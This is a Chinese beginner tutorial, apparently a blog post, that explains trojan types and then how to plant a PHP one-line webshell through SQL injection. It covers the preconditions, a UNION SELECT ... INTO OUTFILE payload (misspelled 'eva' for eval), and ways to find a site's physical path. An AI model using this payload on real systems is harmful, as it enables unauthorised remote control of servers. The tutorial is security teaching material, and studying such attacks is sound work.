【新手入门】SQL注入之getshell(木马)

木马介绍

木马其实就是一段程序,这个程序运行到目标主机上时,主要可以对目标进行远程控制、盗取信息等功能,一般不会破坏目标主机,当然,这也看黑客是否想要搞破坏。

按照功能分类:远控型、破坏型、流氓软件型、盗取信息型等等

按照连接方式分类:正向连接、反向连接、无连接等

按照功能大小分类:大马、小马、一句话木马

这里我们简单说一下php的一句话木马,然后通过sql注入将一句话木马写入目标服务器,再通过木马利用工具连接木马程序从而达到控制目标主机的效果。

通过注入点写入木马程序的前提条件

1.mysql开启了secure_file_priv=" "的配置.

2.知道了网站代码的真实物理路径.

3.物理路径具备写入权限.

4.最好是root用户,这个条件非必须,但是有最好.

通过注入点写入木马程序

' union select "<?php @eva($_POST' jaden');?>",2 into outfile "c:\\phpstudyPHPTutorial\\www\ljaden.php"+--+

获得后台真实物理路径的方法

1.收集站点敏感目录,比如phpinfo.php探针文件是否可以访问到

2.站点网址输入一些不存在的网址 或者加一些非法参数数据,让网站报错,看错误信息中是否存在路径信息

3.指纹信息收集

nginx默认站点目录:/usr/share/nginx/htm1,配置文件路径:/etc/nginx/nginx.conf

apache默认站点目录:/var/www/htm1

4.通过站点其他漏洞来获取配置信息、真实物理路径信息,比如如果发现远程命令执行漏洞,针对php的站点,直接执行一个phpinfo()函数,可以看到phpinfo.php所展示的各种信息等等。

相关推荐
kyriewen7 小时前
Anthropic 估值逼近万亿美元,Claude Sonnet 5 + Claude Science 一天两连发
前端·ai编程·claude
小徐_23338 小时前
Wot UI 2.2.0 发布:Button 新增 subtle,VideoPreview 预览体验继续增强
前端·微信小程序·uni-app
倔强的石头_9 小时前
《Kingbase护城河》——猎捕慢查询:执行计划的微观解析与索引调优实战
数据库
天蓝色的鱼鱼10 小时前
关于 CSS 你可能不知道的属性,但关键时刻很有用
前端·css
SelectDB11 小时前
Apache Doris Python UDF:让 SQL 直接调用 Python 生态,支撑 Agent 时代复杂业务逻辑
大数据·数据库·python
泯泷11 小时前
第 2 篇:设计第一套字节码:Opcode、Instruction 与 Constant Pool
前端·javascript·安全
妙码生花11 小时前
从 PHP 到 AI + Golang,程序员自救转型手记(十五):优化细节、网络请求封装
前端·后端·ai编程
泯泷11 小时前
第 1 篇:从 1 + 2 开始:亲手写出第一台 JSVM
前端·javascript·安全
团团崽_七分甜11 小时前
Spring Boot 核心知识点总结
前端